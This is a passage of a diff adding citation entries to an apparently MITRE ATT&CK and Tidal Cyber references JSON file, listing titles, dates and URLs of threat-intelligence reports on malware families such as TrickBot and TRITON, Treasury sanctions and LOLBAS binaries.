"related": [], + "uuid": "42c7faa2-f664-4e4a-9d23-93c88a09da5b", + "value": "Kaspersky Transparent Tribe August 2020" + }, + { + "description": "Microsoft. (2016, June 1). Transport agents. Retrieved June 24, 2019.", + "meta": { + "date_accessed": "2019-06-24T00:00:00Z", + "date_published": "2016-06-01T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help" + ], + "source": "MITRE", + "title": "Transport agents" + }, + "related": [], + "uuid": "16ae3e7e-5f0d-4ca9-8453-be960b2111b6", + "value": "Microsoft TransportAgent Jun 2016" + }, + { + "description": "ss64. (n.d.). trap. Retrieved May 21, 2019.", + "meta": { + "date_accessed": "2019-05-21T00:00:00Z", + "refs": [ + "https://ss64.com/bash/trap.html" + ], + "source": "MITRE", + "title": "trap" + }, + "related": [], + "uuid": "143462e1-b7e8-4e18-9cb1-6f4f3969e891", + "value": "Trap Manual" + }, + { + "description": "TONY LAMBERT. (2022, June 7). Trapping the Netwire RAT on Linux. Retrieved September 28, 2023.", + "meta": { + "date_accessed": "2023-09-28T00:00:00Z", + "date_published": "2022-06-07T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/" + ], + "source": "MITRE", + "title": "Trapping the Netwire RAT on Linux" + }, + "related": [], + "uuid": "6d4c6c52-38ae-52f5-b438-edeceed446a5", + "value": "Red Canary Netwire Linux 2022" + }, + { + "description": "Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, 2019.", + "meta": { + "date_accessed": "2019-05-21T00:00:00Z", + "date_published": "2016-03-29T00:00:00Z", + "refs": [ + "https://bash.cyberciti.biz/guide/Trap_statement" + ], + "source": "MITRE", + "title": "Trap statement" + }, + "related": [], + "uuid": "24cf5471-f327-4407-b32f-055537f3495e", + "value": "Cyberciti Trap Statements" + }, + { + "description": "Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020.", + "meta": { + "date_accessed": "2020-12-10T00:00:00Z", + "date_published": "2020-09-17T00:00:00Z", + "refs": [ + "https://home.treasury.gov/news/press-releases/sm1127" + ], + "source": "MITRE", + "title": "Treasury Sanctions Cyber Actors Backed by Iranian Intelligence" + }, + "related": [], + "uuid": "0c8ff80a-6b1d-4212-aa40-99aeef04ce05", + "value": "Dept. of Treasury Iran Sanctions September 2020" + }, + { + "description": "U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021.", + "meta": { + "date_accessed": "2021-09-15T00:00:00Z", + "date_published": "2019-12-05T00:00:00Z", + "refs": [ + "https://home.treasury.gov/news/press-releases/sm845" + ], + "source": "MITRE", + "title": "Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware" + }, + "related": [], + "uuid": "074a52c4-26d9-4083-9349-c14e2639c1bc", + "value": "Treasury EvilCorp Dec 2019" + }, + { + "description": "US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2019-09-13T00:00:00Z", + "refs": [ + "https://home.treasury.gov/news/press-releases/sm774" + ], + "source": "MITRE", + "title": "Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups" + }, + "related": [], + "uuid": "54977bb2-2929-41d7-bdea-06d39dc76174", + "value": "Treasury North Korean Cyber Groups September 2019" + }, + { + "description": "Wolfram, J. et al. (2022, April 28). Trello From the Other Side: Tracking APT29 Phishing Campaigns. Retrieved August 3, 2022.", + "meta": { + "date_accessed": "2022-08-03T00:00:00Z", + "date_published": "2022-04-28T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns" + ], + "source": "MITRE", + "title": "Trello From the Other Side: Tracking APT29 Phishing Campaigns" + }, + "related": [], + "uuid": "5590bb5c-d9d1-480c-bb69-1944c1cf2431", + "value": "Mandiant APT29 Trello" + }, + { + "description": "Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017.", + "meta": { + "date_accessed": "2017-11-17T00:00:00Z", + "date_published": "2015-08-01T00:00:00Z", + "refs": [ + "https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf" + ], + "source": "MITRE", + "title": "Trends and Lessons from Three Years Fighting Malicious Extensions" + }, + "related": [], + "uuid": "f34fcf1f-370e-4b6e-9cc4-7ee4075faf6e", + "value": "Malicious Chrome Extension Numbers" + }, + { + "description": "tria.ge. (n.d.). Triage 23893f035f8564dfea5030b9fdd54120d96072bb. Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://tria.ge/230726-q34mlacc72" + ], + "source": "Tidal Cyber", + "title": "Triage 23893f035f8564dfea5030b9fdd54120d96072bb" + }, + "related": [], + "uuid": "3c4857e0-0318-435f-9459-bd57d83e84fe", + "value": "Triage 23893f035f8564dfea5030b9fdd54120d96072bb" + }, + { + "description": "tria.ge. (n.d.). Triage e82c11612c0870e8175eafa8c9c5f9151d0b80d7. Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://tria.ge/231004-q6y7aaeb22" + ], + "source": "Tidal Cyber", + "title": "Triage e82c11612c0870e8175eafa8c9c5f9151d0b80d7" + }, + "related": [], + "uuid": "fd9800c3-c556-4804-a4ea-f31c2b198dcf", + "value": "Triage e82c11612c0870e8175eafa8c9c5f9151d0b80d7" + }, + { + "description": "ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.", + "meta": { + "date_accessed": "2022-10-18T00:00:00Z", + "date_published": "2022-05-11T00:00:00Z", + "refs": [ + "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf" + ], + "source": "MITRE", + "title": "Tricephalic Hellkeeper: a tale of a passive backdoor" + }, + "related": [], + "uuid": "84ffd130-97b9-4bbf-bc3e-42accdf248ce", + "value": "exatrack bpf filters passive backdoors" + }, + { + "description": "Umawing, J. (2019, September 3). TrickBot adds new trick to its arsenal: tampering with trusted texts. Retrieved June 15, 2020.", + "meta": { + "date_accessed": "2020-06-15T00:00:00Z", + "date_published": "2019-09-03T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/trojans/2019/09/trickbot-adds-new-trick-to-its-arsenal-tampering-with-trusted-texts/" + ], + "source": "MITRE", + "title": "TrickBot adds new trick to its arsenal: tampering with trusted texts" + }, + "related": [], + "uuid": "4d6d258f-a57f-4cfd-880a-1ecd98e26d9f", + "value": "Malwarebytes TrickBot Sep 2019" + }, + { + "description": "Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.", + "meta": { + "date_accessed": "2019-03-12T00:00:00Z", + "date_published": "2019-02-12T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/" + ], + "source": "MITRE", + "title": "Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire" + }, + "related": [], + "uuid": "c402888a-ccd1-4cbc-856c-ff0bdcb8b30b", + "value": "TrendMicro Trickbot Feb 2019" + }, + { + "description": "Eclypsium, Advanced Intelligence. (2020, December 1). TRICKBOT NOW OFFERS ‘TRICKBOOT’: PERSIST, BRICK, PROFIT. Retrieved March 15, 2021.", + "meta": { + "date_accessed": "2021-03-15T00:00:00Z", + "date_published": "2020-12-01T00:00:00Z", + "refs": [ + "https://eclypsium.com/wp-content/uploads/2020/12/TrickBot-Now-Offers-TrickBoot-Persist-Brick-Profit.pdf" + ], + "source": "MITRE", + "title": "TRICKBOT NOW OFFERS ‘TRICKBOOT’: PERSIST, BRICK, PROFIT" + }, + "related": [], + "uuid": "ad72e27f-ae4f-425a-a4ef-c76a20382691", + "value": "Eclypsium Trickboot December 2020" + }, + { + "description": "Villadsen, O., et al. (2021, October 13). Trickbot Rising - Gang Doubles Down on Infection Efforts to Amass Network Footholds. Retrieved June 15, 2023.", + "meta": { + "date_accessed": "2023-06-15T00:00:00Z", + "date_published": "2021-10-13T00:00:00Z", + "refs": [ + "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/" + ], + "source": "MITRE", + "title": "Trickbot Rising - Gang Doubles Down on Infection Efforts to Amass Network Footholds" + }, + "related": [], + "uuid": "d796e773-7335-549f-a79b-a2961f85a8ec", + "value": "IBM X-Force ITG23 Oct 2021" + }, + { + "description": "Anthony, N., Pascual, C.. (2018, November 1). Trickbot Shows Off New Trick: Password Grabber Module. Retrieved November 16, 2018.", + "meta": { + "date_accessed": "2018-11-16T00:00:00Z", + "date_published": "2018-11-01T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module/" + ], + "source": "MITRE", + "title": "Trickbot Shows Off New Trick: Password Grabber Module" + }, + "related": [], + "uuid": "5504d906-579e-4b1c-8864-d811b67a25f8", + "value": "Trend Micro Trickbot Nov 2018" + }, + { + "description": "Joe Security. (2020, July 13). TrickBot's new API-Hammering explained. Retrieved September 30, 2021.", + "meta": { + "date_accessed": "2021-09-30T00:00:00Z", + "date_published": "2020-07-13T00:00:00Z", + "refs": [ + "https://www.joesecurity.org/blog/498839998833561473" + ], + "source": "MITRE", + "title": "TrickBot's new API-Hammering explained" + }, + "related": [], + "uuid": "f5441718-3c0d-4b26-863c-24df1130b090", + "value": "Joe Sec Trickbot" + }, + { + "description": "Bacurio Jr., F. and Salvio, J. (2018, April 9). Trickbot’s New Reconnaissance Plugin. Retrieved February 14, 2019.", + "meta": { + "date_accessed": "2019-02-14T00:00:00Z", + "date_published": "2018-04-09T00:00:00Z", + "refs": [ + "https://www.fortinet.com/blog/threat-research/trickbot-s-new-reconnaissance-plugin.html" + ], + "source": "MITRE", + "title": "Trickbot’s New Reconnaissance Plugin" + }, + "related": [], + "uuid": "a5dc1702-1930-463a-a581-74cc13e66ba5", + "value": "Fortinet TrickBot" + }, + { + "description": "Ionut Illascu. (2021, July 14). Trickbot updates its VNC module for high-value targets. Retrieved September 10, 2021.", + "meta": { + "date_accessed": "2021-09-10T00:00:00Z", + "date_published": "2021-07-14T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/trickbot-updates-its-vnc-module-for-high-value-targets/" + ], + "source": "MITRE", + "title": "Trickbot updates its VNC module for high-value targets" + }, + "related": [], + "uuid": "0484ddd0-5402-4300-99d4-4504591dddc0", + "value": "Trickbot VNC module July 2021" + }, + { + "description": "Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.", + "meta": { + "date_accessed": "2018-08-02T00:00:00Z", + "date_published": "2016-10-15T00:00:00Z", + "refs": [ + "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre" + ], + "source": "MITRE", + "title": "TrickBot: We Missed you, Dyre" + }, + "related": [], + "uuid": "839c02d1-58ec-4e25-a981-0276dbb1acc8", + "value": "Fidelis TrickBot Oct 2016" + }, + { + "description": "Holland, A. (2019, March 7). Tricks and COMfoolery: How Ursnif Evades Detection. Retrieved June 10, 2019.", + "meta": { + "date_accessed": "2019-06-10T00:00:00Z", + "date_published": "2019-03-07T00:00:00Z", + "refs": [ + "https://www.bromium.com/how-ursnif-evades-detection/" + ], + "source": "MITRE", + "title": "Tricks and COMfoolery: How Ursnif Evades Detection" + }, + "related": [], + "uuid": "04028685-b2e0-4faf-8c9d-36d1b07f09fc", + "value": "Bromium Ursnif Mar 2017" + }, + { + "description": "Keshet, L. (2016, November 09). Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations. Retrieved August 2, 2018.", + "meta": { + "date_accessed": "2018-08-02T00:00:00Z", + "date_published": "2016-11-09T00:00:00Z", + "refs": [ + "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/" + ], + "source": "MITRE", + "title": "Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations" + }, + "related": [], + "uuid": "092aec63-aea0-4bc9-9c05-add89b4233ff", + "value": "IBM TrickBot Nov 2016" + }, + { + "description": "Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2020-09-03T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html" + ], + "source": "MITRE", + "title": "Tricky 'Forms' of Phishing" + }, + "related": [], + "uuid": "621f1c52-5f34-4293-a507-b58c4084a19b", + "value": "TrendMictro Phishing" + }, + { + "description": "Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019.", + "meta": { + "date_accessed": "2019-01-16T00:00:00Z", + "date_published": "2018-05-06T00:00:00Z", + "refs": [ + "https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing" + ], + "source": "MITRE", + "title": "Trimarc Research: Detecting Password Spraying with Security Event Auditing" + }, + "related": [], + "uuid": "aadbd0a8-00f2-404b-8d02-6d36292726da", + "value": "Trimarc Detecting Password Spraying" + }, + { + "description": "Dragos. (2017, December 13). TRISIS Malware Analysis of Safety System Targeted Malware. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "date_published": "2017-12-13T00:00:00Z", + "refs": [ + "https://www.dragos.com/wp-content/uploads/TRISIS-01.pdf" + ], + "source": "MITRE", + "title": "TRISIS Malware Analysis of Safety System Targeted Malware" + }, + "related": [], + "uuid": "7659f7bc-2059-4a4d-a12c-17ccd99b737a", + "value": "Dragos TRISIS" + }, + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "date_published": "2019-04-10T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + ], + "source": "MITRE", + "title": "TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping" + }, + "related": [], + "uuid": "49c97b85-ca22-400a-9dc4-6290cc117f04", + "value": "FireEye TRITON 2019" + }, + { + "description": "Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.", + "meta": { + "date_accessed": "2019-04-29T00:00:00Z", + "date_published": "2019-04-10T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html" + ], + "source": "MITRE", + "title": "TRITON Appendix C" + }, + "related": [], + "uuid": "491783dc-7a6b-42a6-b923-c4439117e7e4", + "value": "FireEye TEMP.Veles JSON April 2019" + }, + { + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "date_published": "2018-10-23T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" + ], + "source": "MITRE", + "title": "TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers" + }, + "related": [], + "uuid": "e41151fa-ea11-43ca-9689-c65aae63a8d2", + "value": "FireEye TEMP.Veles 2018" + }, + { + "description": "Miller-Osborn, J. and Grunzweig, J.. (2017, March 30). Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations. Retrieved March 30, 2017.", + "meta": { + "date_accessed": "2017-03-30T00:00:00Z", + "date_published": "2017-03-30T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" + ], + "source": "MITRE", + "title": "Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations" + }, + "related": [], + "uuid": "4f3d7a08-2cf5-49ed-8bcd-6df180f3d194", + "value": "Palo Alto MoonWind March 2017" + }, + { + "description": "CyberESI. (2011). TROJAN.GTALK. Retrieved June 29, 2015.", + "meta": { + "date_accessed": "2015-06-29T00:00:00Z", + "date_published": "2011-01-01T00:00:00Z", + "refs": [ + "http://www.cyberengineeringservices.com/2011/12/15/trojan-gtalk/" + ], + "source": "MITRE", + "title": "TROJAN.GTALK" + }, + "related": [], + "uuid": "7952f365-1284-4461-8bc3-d8e20e38e1ba", + "value": "CyberESI GTALK" + }, + { + "description": "Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018.", + "meta": { + "date_accessed": "2018-02-20T00:00:00Z", + "date_published": "2010-01-11T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2010-011114-1830-99" + ], + "source": "MITRE", + "title": "Trojan.Hydraq" + }, + "related": [], + "uuid": "2f99e508-6d0c-4590-8156-cdcadeef8ed9", + "value": "Symantec Hydraq Jan 2010" + }, + { + "description": "Moench, B. and Aboud, E. (2016, August 23). Trojan.Kwampirs. Retrieved May 10, 2018.", + "meta": { + "date_accessed": "2018-05-10T00:00:00Z", + "date_published": "2016-08-23T00:00:00Z", + "refs": [ + "https://www.symantec.com/security-center/writeup/2016-081923-2700-99" + ], + "source": "MITRE", + "title": "Trojan.Kwampirs" + }, + "related": [], + "uuid": "d6fb6b97-042c-4a66-a2ba-31c13f96a144", + "value": "Symantec Security Center Trojan.Kwampirs" + }, + { + "description": "Neville, A. (2012, June 15). Trojan.Naid. Retrieved February 22, 2018.", + "meta": { + "date_accessed": "2018-02-22T00:00:00Z", + "date_published": "2012-06-15T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99" + ], + "source": "MITRE", + "title": "Trojan.Naid" + }, + "related": [], + "uuid": "dc3c16b3-e06b-4b56-b6bd-b98a0b39df3b", + "value": "Symantec Naid June 2012" + }, + { + "description": "Mullaney, C. & Honda, H. (2012, May 4). Trojan.Pasam. Retrieved February 22, 2018.", + "meta": { + "date_accessed": "2018-02-22T00:00:00Z", + "date_published": "2012-05-04T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2012-050412-4128-99" + ], + "source": "MITRE", + "title": "Trojan.Pasam" + }, + "related": [], + "uuid": "c8135017-43c5-4bde-946e-141684c29b7a", + "value": "Symantec Pasam May 2012" + }, + { + "description": "Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "date_published": "2017-09-15T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918" + ], + "source": "MITRE", + "title": "TrojanSpy:Win32/Ursnif.gen!I" + }, + "related": [], + "uuid": "2b0c16e3-9ea0-455e-ae01-18d9b388fea6", + "value": "Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017" + }, + { + "description": "Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "date_published": "2008-06-28T00:00:00Z", + "refs": [ + "https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2" + ], + "source": "MITRE", + "title": "Trojan.Ushedix" + }, + "related": [], + "uuid": "9df2b407-df20-403b-ba1b-a681b9c74c7e", + "value": "Symantec Ushedix June 2008" + }, + { + "description": "Yagi, J. (2014, August 24). Trojan.Volgmer. Retrieved July 16, 2018.", + "meta": { + "date_accessed": "2018-07-16T00:00:00Z", + "date_published": "2014-08-24T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20181126143456/https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2" + ], + "source": "MITRE", + "title": "Trojan.Volgmer" + }, + "related": [], + "uuid": "8f5ba106-267a-4f9e-9498-04e27f509c5e", + "value": "Symantec Volgmer Aug 2014" + }, + { + "description": "Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020.", + "meta": { + "date_accessed": "2020-05-15T00:00:00Z", + "date_published": "2019-11-25T00:00:00Z", + "refs": [ + "https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml" + ], + "source": "MITRE", + "title": "Trojan:W32/Lokibot" + }, + "related": [], + "uuid": "e4ed8915-8f1e-47a0-ad99-075c66fa9cd3", + "value": "FSecure Lokibot November 2019" + }, + { + "description": "Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.", + "meta": { + "date_accessed": "2018-09-14T00:00:00Z", + "date_published": "2017-10-12T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick" + ], + "source": "MITRE", + "title": "Trojan:Win32/Totbrick" + }, + "related": [], + "uuid": "3abe861b-0e3b-458a-98cf-38450058b4a5", + "value": "Microsoft Totbrick Oct 2017" + }, + { + "description": "Ciubotariu, M. (2014, January 23). Trojan.Zeroaccess.C Hidden in NTFS EA. Retrieved December 2, 2014.", + "meta": { + "date_accessed": "2014-12-02T00:00:00Z", + "date_published": "2014-01-23T00:00:00Z", + "refs": [ + "http://www.symantec.com/connect/blogs/trojanzeroaccessc-hidden-ntfs-ea" + ], + "source": "MITRE", + "title": "Trojan.Zeroaccess.C Hidden in NTFS EA" + }, + "related": [], + "uuid": "8a4583fe-cf73-47ba-a4ea-3e5ef1eb51b6", + "value": "Ciubotariu 2014" + }, + { + "description": "Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018.", + "meta": { + "date_accessed": "2018-08-08T00:00:00Z", + "date_published": "2012-10-08T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd" + ], + "source": "MITRE", + "title": "TROJ_FAKEAV.GZD" + }, + "related": [], + "uuid": "5d9e974f-07f8-48e4-96b6-632ecb31465d", + "value": "TrendMicro TROJ-FAKEAV OCT 2012" + }, + { + "description": "Trend Micro. (2012, October 9). TROJ_ZEGOST. Retrieved September 2, 2021.", + "meta": { + "date_accessed": "2021-09-02T00:00:00Z", + "date_published": "2012-10-09T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost" + ], + "source": "MITRE", + "title": "TROJ_ZEGOST" + }, + "related": [], + "uuid": "c3790ad6-704a-4076-8729-61b5df9d7983", + "value": "troj_zegost" + }, + { + "description": "Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.", + "meta": { + "date_accessed": "2020-05-20T00:00:00Z", + "date_published": "2020-05-12T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments" + }, + "related": [], + "uuid": "4fbc1df0-f174-4461-817d-0baf6e947ba1", + "value": "TrendMicro Tropic Trooper May 2020" + }, + { + "description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper’s New Strategy. Retrieved November 9, 2018.", + "meta": { + "date_accessed": "2018-11-09T00:00:00Z", + "date_published": "2018-03-14T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Tropic Trooper’s New Strategy" + }, + "related": [], + "uuid": "5d69d122-13bc-45c4-95ab-68283a21b699", + "value": "TrendMicro Tropic Trooper Mar 2018" + }, + { + "description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.", + "meta": { + "date_accessed": "2018-11-09T00:00:00Z", + "date_published": "2016-11-22T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ], + "source": "MITRE", + "title": "Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy" + }, + "related": [], + "uuid": "cad84e3d-9506-44f8-bdd9-d090e6ce9b06", + "value": "Unit 42 Tropic Trooper Nov 2016" + }, + { + "description": "Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved December 18, 2020.", + "meta": { + "date_accessed": "2020-12-18T00:00:00Z", + "date_published": "2016-11-22T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ], + "source": "MITRE", + "title": "Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy" + }, + "related": [], + "uuid": "47524b17-1acd-44b1-8de5-168369fa9455", + "value": "paloalto Tropic Trooper 2016" + }, + { + "description": "Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2016-12-31T00:00:00Z", + "refs": [ + "https://github.com/dxa4481/truffleHog" + ], + "source": "MITRE", + "title": "truffleHog" + }, + "related": [], + "uuid": "324a563f-55ee-49e9-9fc7-2b8e35f36875", + "value": "GitHub truffleHog" + }, + { + "description": "Trusted Computing Group. (2008, April 29). Trusted Platform Module (TPM) Summary. Retrieved June 8, 2016.", + "meta": { + "date_accessed": "2016-06-08T00:00:00Z", + "date_published": "2008-04-29T00:00:00Z", + "refs": [ + "http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf" + ], + "source": "MITRE", + "title": "Trusted Platform Module (TPM) Summary" + }, + "related": [], + "uuid": "51a2a2fd-7828-449d-aab5-dbcf5d37f020", + "value": "TCG Trusted Platform Module" + }, + { + "description": "Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019.", + "meta": { + "date_accessed": "2019-02-14T00:00:00Z", + "date_published": "2009-10-07T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)" + ], + "source": "MITRE", + "title": "Trust Technologies" + }, + "related": [], + "uuid": "e6bfc6a8-9eea-4c65-9c2b-04749da72a92", + "value": "Microsoft Trusts" + }, + { + "description": "Adam Boileau. (2005, August 5). Trust Transience: Post Intrusion SSH Hijacking. Retrieved December 19, 2017.", + "meta": { + "date_accessed": "2017-12-19T00:00:00Z", + "date_published": "2005-08-05T00:00:00Z", + "refs": [ + "https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf" + ], + "source": "MITRE", + "title": "Trust Transience: Post Intrusion SSH Hijacking" + }, + "related": [], + "uuid": "64f94126-de4c-4204-8409-d26804f32cff", + "value": "SSHjack Blackhat" + }, + { + "description": "Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.", + "meta": { + "date_accessed": "2018-09-14T00:00:00Z", + "date_published": "2016-10-31T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n" + ], + "source": "MITRE", + "title": "TSPY_TRICKLOAD.N" + }, + "related": [], + "uuid": "d6419764-f203-4089-8b38-860c442238e7", + "value": "Trend Micro Totbrick Oct 2016" + }, + { + "description": "LOLBAS. (2020, May 12). Ttdinject.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-05-12T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/" + ], + "source": "Tidal Cyber", + "title": "Ttdinject.exe" + }, + "related": [], + "uuid": "3146c9c9-9836-4ce5-afe6-ef8f7b4a7b9d", + "value": "Ttdinject.exe - LOLBAS Project" + }, + { + "description": "Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.", + "meta": { + "date_accessed": "2021-10-28T00:00:00Z", + "date_published": "2020-10-01T00:00:00Z", + "refs": [ + "https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/" + ], + "source": "MITRE", + "title": "Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities" + }, + "related": [], + "uuid": "f3e60cae-3225-4800-bc15-cb46ff715061", + "value": "ttint_rat" + }, + { + "description": "LOLBAS. (2019, November 5). Tttracer.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-11-05T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/" + ], + "source": "Tidal Cyber", + "title": "Tttracer.exe" + }, + "related": [], + "uuid": "7c88a77e-034e-4847-8bd7-1be3a684a158", + "value": "Tttracer.exe - LOLBAS Project" + }, + { + "description": "Belcher, P.. (2016, July 28). Tunnel of Gov: DNC Hack and the Russian XTunnel. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2016-07-28T00:00:00Z", + "refs": [ + 